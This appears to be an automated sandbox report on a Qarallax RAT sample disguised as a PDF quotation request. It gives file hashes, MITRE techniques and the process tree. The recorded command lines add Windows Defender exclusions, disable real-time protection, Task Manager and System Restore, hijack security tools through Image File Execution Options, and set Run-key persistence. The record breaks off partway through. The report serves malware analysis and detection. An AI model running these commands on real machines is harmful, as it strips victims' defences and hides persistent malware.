qarallax | 8bcdae78528284a03c0a797472234561fd523be8a9a822f51f056cf8e72a1755

Analysis

max time kernel
131s
max time network
145s
platform
windows10_x64
resource
win10
submitted
18-08-2020 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Techno Group Pakistan Quotation Request_Pdf.jar
Size

403KB
MD5

fc115bb8e02dd12ad2e1f5b334174288
SHA1

9e41b33dc89f43e509ef4297f29934ef3a9c2945
SHA256

8bcdae78528284a03c0a797472234561fd523be8a9a822f51f056cf8e72a1755
SHA512

5cc026bc0eca4cf136a6614df24ed84e5cff65bb8558384d4f672db5cb0f40d9614e16c7e78873a871573f6c78951befb8020be9907ebad030e77ff6a32f47d8

Score

10^/10

persistence trojan qarallax evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\UxFqUFhDWc5363647669437565251.xml	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Loads dropped DLL 1 IoCs

Processes:

java.exe

pid process

2788 java.exe

pid	process
2788	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

java.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

Processes:

java.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

Processes:

java.exe

description ioc process

File created C:\Windows\System32\cFnxt java.exe
File opened for modification C:\Windows\System32\cFnxt java.exe

description	ioc	process
File created	C:\Windows\System32\cFnxt	java.exe
File opened for modification	C:\Windows\System32\cFnxt	java.exe

Kills process with taskkill 19 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2776	taskkill.exe
2688	taskkill.exe
4416	taskkill.exe
4156	taskkill.exe
4444	taskkill.exe
4852	taskkill.exe
4220	taskkill.exe
3740	taskkill.exe
4972	taskkill.exe
3800	taskkill.exe
3744	taskkill.exe
4900	taskkill.exe
4140	taskkill.exe
4424	taskkill.exe
3740	taskkill.exe
1860	taskkill.exe
4584	taskkill.exe
4308	taskkill.exe
4684	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe

pid process

2716 powershell.exe
2716 powershell.exe
2716 powershell.exe
2716 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

java.exe

pid process

2788 java.exe

pid	process
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe

pid	process
2788	java.exe

Suspicious use of AdjustPrivilegeToken 167 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: 36	744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: 36	744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3168	WMIC.exe
Token: SeSecurityPrivilege	3168	WMIC.exe
Token: SeTakeOwnershipPrivilege	3168	WMIC.exe
Token: SeLoadDriverPrivilege	3168	WMIC.exe
Token: SeSystemProfilePrivilege	3168	WMIC.exe
Token: SeSystemtimePrivilege	3168	WMIC.exe
Token: SeProfSingleProcessPrivilege	3168	WMIC.exe
Token: SeIncBasePriorityPrivilege	3168	WMIC.exe
Token: SeCreatePagefilePrivilege	3168	WMIC.exe
Token: SeBackupPrivilege	3168	WMIC.exe
Token: SeRestorePrivilege	3168	WMIC.exe
Token: SeShutdownPrivilege	3168	WMIC.exe
Token: SeDebugPrivilege	3168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3168	WMIC.exe
Token: SeRemoteShutdownPrivilege	3168	WMIC.exe
Token: SeUndockPrivilege	3168	WMIC.exe
Token: SeManageVolumePrivilege	3168	WMIC.exe
Token: 33	3168	WMIC.exe
Token: 34	3168	WMIC.exe
Token: 35	3168	WMIC.exe
Token: 36	3168	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3168	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

java.exe

pid process

2788 java.exe

pid	process
2788	java.exe

Suspicious use of WriteProcessMemory 416 IoCs

Processes:

java.execmd.execmd.exe

description	pid	process	target process
PID 2788 wrote to memory of 2276	2788	java.exe	cmd.exe
PID 2788 wrote to memory of 2276	2788	java.exe	cmd.exe
PID 2788 wrote to memory of 3980	2788	java.exe	cmd.exe
PID 2788 wrote to memory of 3980	2788	java.exe	cmd.exe
PID 3980 wrote to memory of 744	3980	cmd.exe	WMIC.exe
PID 3980 wrote to memory of 744	3980	cmd.exe	WMIC.exe
PID 2788 wrote to memory of 3748	2788	java.exe	cmd.exe
PID 2788 wrote to memory of 3748	2788	java.exe	cmd.exe
PID 3748 wrote to memory of 3168	3748	cmd.exe	WMIC.exe
PID 3748 wrote to memory of 3168	3748	cmd.exe	WMIC.exe
PID 2788 wrote to memory of 3912	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 3912	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 3468	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 3468	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 632	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 632	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 804	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 804	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 1004	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 1004	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 1020	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 1020	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 1208	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 1208	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 1336	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 1336	2788	java.exe	attrib.exe
PID 2788 wrote to memory of 2156	2788	java.exe	cmd.exe
PID 2788 wrote to memory of 2156	2788	java.exe	cmd.exe
PID 2788 wrote to memory of 2716	2788	java.exe	powershell.exe
PID 2788 wrote to memory of 2716	2788	java.exe	powershell.exe
PID 2788 wrote to memory of 2720	2788	java.exe	reg.exe
PID 2788 wrote to memory of 2720	2788	java.exe	reg.exe
PID 2788 wrote to memory of 2776	2788	java.exe	taskkill.exe
PID 2788 wrote to memory of 2776	2788	java.exe	taskkill.exe
PID 2788 wrote to memory of 3880	2788	java.exe	reg.exe
PID 2788 wrote to memory of 3880	2788	java.exe	reg.exe
PID 2788 wrote to memory of 1940	2788	java.exe	reg.exe
PID 2788 wrote to memory of 1940	2788	java.exe	reg.exe
PID 2788 wrote to memory of 508	2788	java.exe	reg.exe
PID 2788 wrote to memory of 508	2788	java.exe	reg.exe
PID 2788 wrote to memory of 3800	2788	java.exe	reg.exe
PID 2788 wrote to memory of 3800	2788	java.exe	reg.exe
PID 2788 wrote to memory of 992	2788	java.exe	reg.exe
PID 2788 wrote to memory of 992	2788	java.exe	reg.exe
PID 2788 wrote to memory of 556	2788	java.exe	reg.exe
PID 2788 wrote to memory of 556	2788	java.exe	reg.exe
PID 2788 wrote to memory of 844	2788	java.exe	reg.exe
PID 2788 wrote to memory of 844	2788	java.exe	reg.exe
PID 2788 wrote to memory of 3616	2788	java.exe	reg.exe
PID 2788 wrote to memory of 3616	2788	java.exe	reg.exe
PID 2788 wrote to memory of 1164	2788	java.exe	reg.exe
PID 2788 wrote to memory of 1164	2788	java.exe	reg.exe
PID 2788 wrote to memory of 2876	2788	java.exe	reg.exe
PID 2788 wrote to memory of 2876	2788	java.exe	reg.exe
PID 2788 wrote to memory of 2996	2788	java.exe	reg.exe
PID 2788 wrote to memory of 2996	2788	java.exe	reg.exe
PID 2788 wrote to memory of 3400	2788	java.exe	reg.exe
PID 2788 wrote to memory of 3400	2788	java.exe	reg.exe
PID 2788 wrote to memory of 1520	2788	java.exe	reg.exe
PID 2788 wrote to memory of 1520	2788	java.exe	reg.exe
PID 2788 wrote to memory of 2560	2788	java.exe	reg.exe
PID 2788 wrote to memory of 2560	2788	java.exe	reg.exe
PID 2788 wrote to memory of 1100	2788	java.exe	reg.exe
PID 2788 wrote to memory of 1100	2788	java.exe	reg.exe

Views/modifies file attributes 1 TTPs 8 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

804 attrib.exe
1004 attrib.exe
1020 attrib.exe
1208 attrib.exe
1336 attrib.exe
3912 attrib.exe
3468 attrib.exe
632 attrib.exe

pid	process
804	attrib.exe
1004	attrib.exe
1020	attrib.exe
1208	attrib.exe
1336	attrib.exe
3912	attrib.exe
3468	attrib.exe
632	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Techno Group Pakistan Quotation Request_Pdf.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:2276

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3748

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\Windows\SYSTEM32\attrib.exe
attrib +h C:\Users\Admin\Oracle
2⤵
- Views/modifies file attributes
PID:3912

C:\Windows\SYSTEM32\attrib.exe
attrib +h +r +s C:\Users\Admin\.ntusernt.ini
2⤵
- Views/modifies file attributes
PID:3468

C:\Windows\SYSTEM32\attrib.exe
attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:632

C:\Windows\SYSTEM32\attrib.exe
attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:804

C:\Windows\SYSTEM32\attrib.exe
attrib -s -r C:\Users\Admin\ujTBR
2⤵
- Views/modifies file attributes
PID:1004

C:\Windows\SYSTEM32\attrib.exe
attrib +s +r C:\Users\Admin\ujTBR
2⤵
- Views/modifies file attributes
PID:1020

C:\Windows\SYSTEM32\attrib.exe
attrib +h C:\Users\Admin\ujTBR
2⤵
- Views/modifies file attributes
PID:1208

C:\Windows\SYSTEM32\attrib.exe
attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
2⤵
- Views/modifies file attributes
PID:1336

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:2156

C:\Windows\system32\reg.exe
reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
3⤵
PID:2448

C:\Windows\system32\reg.exe
reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
3⤵
PID:472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2716

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
2⤵
PID:2720

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
2⤵
- Kills process with taskkill
PID:2776

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:3880

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
2⤵
PID:1940

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:508

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:3800

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
2⤵
PID:992

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:556

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
2⤵
PID:844

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:3616

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
2⤵
PID:1164

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:2876

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
2⤵
PID:2996

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:3400

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:1520

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
2⤵
PID:2560

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
2⤵
PID:1100

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:2756

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
2⤵
PID:3860

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:396

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
2⤵
- Kills process with taskkill
PID:3800

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:1364

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:2524

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:3980

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:1252

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:1812

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
PID:3880

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:3832

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
PID:2560

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:3604

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:1100

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:3808

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:508

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
2⤵
PID:1004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:636

C:\Windows\system32\reg.exe
reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
3⤵
PID:1748

C:\Windows\system32\reg.exe
reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
3⤵
PID:2124

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
2⤵
- Kills process with taskkill
PID:3740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:3832

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
3⤵
PID:3788

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
3⤵
PID:3168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:3616

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
3⤵
PID:3308

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
3⤵
PID:2084

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:900

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
3⤵
PID:3304

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
3⤵
PID:2988

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:1332

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
3⤵
PID:4000

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
3⤵
PID:3152

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:1580

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
3⤵
PID:2964

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
3⤵
PID:740

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
2⤵
- Kills process with taskkill
PID:2688

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:1364

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
3⤵
PID:1860

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
3⤵
PID:752

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:3468

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
3⤵
PID:4024

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
3⤵
PID:2596

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:1908

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
3⤵
PID:3152

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
3⤵
PID:3836

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:3932

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
3⤵
PID:2272

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
3⤵
PID:1224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:1828

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
3⤵
PID:3824

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
3⤵
PID:572

C:\Windows\SYSTEM32\cmd.exe
cmd.exe
2⤵
PID:2512

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
3⤵
PID:752

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
3⤵
PID:3304

C:\Windows\System32\taskkill.exe
